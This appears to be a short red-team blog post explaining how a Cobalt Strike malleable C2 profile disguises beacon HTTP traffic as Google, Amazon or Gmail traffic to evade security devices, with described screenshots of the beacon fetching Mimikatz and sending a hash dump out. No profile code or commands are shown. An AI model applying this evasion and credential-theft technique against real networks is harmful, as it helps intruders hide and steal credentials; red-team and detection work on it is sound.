I want to discuss creating a cobalt strike malleable C2 profile that handles the beacon connection. By setting up it properly, we can manipulate the beacon connection into trustworthiness by the security devices. There are a lot of profile available on the internet available that you can use
Cobalt strike beacon will communicate with the server using http-post and http-get and http-post
with the C2 profile, we can arrange our http communication to mimic legitimate http traffic, We can mimic our traffic looks like google.com, amazon.com and many other traffic to evade the detection
from the above picture we can see two blocks client and server. We can setup what the http header and parameter will look like in order to evade our beacon communication. Lets analyse this in the http debugger
we can see from both screenshot above the mapping that we can use to evade the connection.
Beacon will use HTTP-post to submit data to the server. Although we can see that the domain is rioasmara.com, the actual IP is my local IP. So if the defender is not careful in assessing the traffic, then it will look legitimate
We can see below that Cobalt Strike beacon downloading Mimikatz from the server and sending the result via http-post
Sending the result back to the server.
Cobalt strike gives some freedom for you to craft your C2 profile. You can mimic legitimate traffic as you want. This would make the evasion even better because it is tough to differentiate the beacon traffic and normal traffic.
Sample of Hash Dump mimicking Gmail traffic profile